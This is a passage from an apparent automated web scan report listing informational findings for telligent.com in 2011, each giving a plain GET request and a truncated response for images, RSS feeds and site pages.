User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a47+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Wed, 05 Jan 2011 23:42:10 GMT
Accept-Ranges: bytes
ETag: "9ad6c32b32adcb1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a52+GMT; expires=Sun, 26-Feb-2012 22:04:52 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:52 GMT
Content-Length: 30437

.PNG
.
...IHDR.....................sBIT....|.d....    pHYs...........~.....tEXtSoftware.Adobe FireworksO..N.. .IDATx...y|T......f..{.a    .. .,.(...!m]kk...V...j..j[k......l+...X..B..........BB.d..>s...qf
...[SNIP]...

7.452. http://telligent.com/files/media/image/promos/Forrester-Promo-Intercompany-collab-250.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /files/media/image/promos/Forrester-Promo-Intercompany-collab-250.png

Request

GET /files/media/image/promos/Forrester-Promo-Intercompany-collab-250.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a47+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Fri, 07 Jan 2011 19:23:23 GMT
Accept-Ranges: bytes
ETag: "92a9c359a0aecb1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a53+GMT; expires=Sun, 26-Feb-2012 22:04:53 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:53 GMT
Content-Length: 12318

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<../.IDATx...    .]E...;....$,    $ .. aI...A.7.#.X|~`.O...{...=.}..:".PAF.d>....<.8,*"..".,.B $........o.......r...v.......sO.Z.U...._u
...[SNIP]...

7.453. http://telligent.com/files/media/image/promos/btn-seehow-readersdig.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /files/media/image/promos/btn-seehow-readersdig.png

Request

GET /files/media/image/promos/btn-seehow-readersdig.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Thu, 13 Jan 2011 17:11:01 GMT
Accept-Ranges: bytes
ETag: "10754dda44b3cb1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a51+GMT; expires=Sun, 26-Feb-2012 22:04:51 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:51 GMT
Content-Length: 17351

.PNG
.
...IHDR...c...[.....?~......tEXtSoftware.Adobe ImageReadyq.e<..CiIDATx..].XUI....PA....[.......c......u...].n......@A@.s    ..Z..;.9.{9.....<..{.L|...3....9D..............l.........@lV$L(#..3..
...[SNIP]...

7.454. http://telligent.com/files/media/image/quotes/quotes-readersdig.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /files/media/image/quotes/quotes-readersdig.png

Request

GET /files/media/image/quotes/quotes-readersdig.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Tue, 18 Jan 2011 00:05:14 GMT
Accept-Ranges: bytes
ETag: "d0b9e161a3b6cb1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a51+GMT; expires=Sun, 26-Feb-2012 22:04:51 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:51 GMT
Content-Length: 18338

.PNG
.
...IHDR...d.........t..*....tEXtSoftware.Adobe ImageReadyq.e<..GDIDATx..}.q.H......O?.........@t..".....DE (.C....`..E..y..r.c........H....e....mzzz..~......@ .....'q....@ ...!.....@ ..L ....
...[SNIP]...

7.455. http://telligent.com/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /login.aspx

Request

GET /login.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a27+GMT; expires=Sun, 26-Feb-2012 23:21:27 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:26 GMT
Connection: close
Content-Length: 41223


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.456. http://telligent.com/members/vinceford/activities/followersrss.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /members/vinceford/activities/followersrss.aspx

Request

GET /members/vinceford/activities/followersrss.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml; charset=utf-8
Last-Modified: Wed, 23 Feb 2011 05:41:50 GMT
ETag: 2/22/2011 11:41:50 PM
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a10+GMT; expires=Sun, 26-Feb-2012 23:21:10 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:10 GMT
Connection: close
Content-Length: 11677

<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="http://telligent.com/utility/FeedStylesheets/rss.xsl" media="screen"?><rss version="2.0" xmlns:dc="http://purl.org/dc/el
...[SNIP]...

7.457. http://telligent.com/members/vinceford/activities/groupsrss.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /members/vinceford/activities/groupsrss.aspx

Request

GET /members/vinceford/activities/groupsrss.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml; charset=utf-8
Last-Modified: Wed, 09 Feb 2011 21:56:13 GMT
ETag: 2/9/2011 3:56:13 PM
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a10+GMT; expires=Sun, 26-Feb-2012 23:21:10 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:10 GMT
Connection: close
Content-Length: 13678

<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="http://telligent.com/utility/FeedStylesheets/rss.xsl" media="screen"?><rss version="2.0" xmlns:dc="http://purl.org/dc/el
...[SNIP]...

7.458. http://telligent.com/members/vinceford/activities/rss.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /members/vinceford/activities/rss.aspx

Request

GET /members/vinceford/activities/rss.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml; charset=utf-8
Last-Modified: Wed, 23 Feb 2011 05:41:50 GMT
ETag: 2/22/2011 11:41:50 PM
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a09+GMT; expires=Sun, 26-Feb-2012 23:21:09 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:10 GMT
Connection: close
Content-Length: 11651

<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="http://telligent.com/utility/FeedStylesheets/rss.xsl" media="screen"?><rss version="2.0" xmlns:dc="http://purl.org/dc/el
...[SNIP]...

7.459. http://telligent.com/members/vinceford/comments/rss.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /members/vinceford/comments/rss.aspx

Request

GET /members/vinceford/comments/rss.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml; charset=utf-8
Last-Modified: Sat, 26 Feb 2011 23:21:09 GMT
ETag: 2/26/2011 5:21:09 PM
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a09+GMT; expires=Sun, 26-Feb-2012 23:21:09 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:09 GMT
Connection: close
Content-Length: 483

<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="http://telligent.com/utility/FeedStylesheets/rss.xsl" media="screen"?><rss version="2.0" xmlns:dc="http://purl.org/dc/el
...[SNIP]...

7.460. http://telligent.com/partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /partners/

Request

GET /partners/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a19+GMT; expires=Sun, 26-Feb-2012 23:22:19 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:18 GMT
Connection: close
Content-Length: 54785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.461. http://telligent.com/privacy_policy.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /privacy_policy.aspx

Request

GET /privacy_policy.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a03+GMT; expires=Sun, 26-Feb-2012 23:23:03 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:23:03 GMT
Connection: close
Content-Length: 53614


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.462. http://telligent.com/products/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /products/

Request

GET /products/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a08+GMT; expires=Sun, 26-Feb-2012 23:21:08 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:07 GMT
Connection: close
Content-Length: 60942


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.463. http://telligent.com/products/request_a_demo.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /products/request_a_demo.aspx

Request

GET /products/request_a_demo.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a08+GMT; expires=Sun, 26-Feb-2012 23:21:08 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:07 GMT
Connection: close
Content-Length: 66085


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.464. http://telligent.com/products/telligent_analytics/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /products/telligent_analytics/

Request

GET /products/telligent_analytics/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a08+GMT; expires=Sun, 26-Feb-2012 23:21:08 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:07 GMT
Connection: close
Content-Length: 60173


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.465. http://telligent.com/products/telligent_enterprise/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /products/telligent_enterprise/

Request

GET /products/telligent_enterprise/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a08+GMT; expires=Sun, 26-Feb-2012 23:21:08 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:07 GMT
Connection: close
Content-Length: 60552


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.466. http://telligent.com/resources/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/

Request

GET /resources/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
